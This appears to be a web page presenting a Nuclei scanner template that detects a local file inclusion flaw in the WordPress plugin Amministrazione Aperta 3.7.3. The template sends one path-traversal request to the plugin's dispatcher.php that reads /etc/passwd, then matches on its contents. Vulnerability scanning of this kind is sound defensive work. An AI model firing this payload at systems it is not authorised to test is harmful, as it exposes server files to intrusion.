WordPress Amministrazione Aperta 3.7.3 - Local File Inclusion

ID: amministrazione-aperta-lfi

Severity: high

Author: daffainfo,Splint3r7

Tags: wp-plugin,lfi,wp,edb,wordpress

Description

WordPress Amministrazione Aperta 3.7.3 is vulnerable to local file inclusion.

YAML Source

id: amministrazione-aperta-lfi

info:
  name: WordPress Amministrazione Aperta 3.7.3 - Local File Inclusion
  author: daffainfo,Splint3r7
  severity: high
  description: WordPress Amministrazione Aperta 3.7.3 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/50838
    - https://wordpress.org/plugins/amministrazione-aperta
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wp-plugin,lfi,wp,edb,wordpress

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022037322879587337119047c3da200259a4d04ee285d0350082d5c0785786ce634c022100865aac7fb4cb461849c6b6eb4185ce9fce1333784ab936429e788ea8b6a28132:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml"

View on Github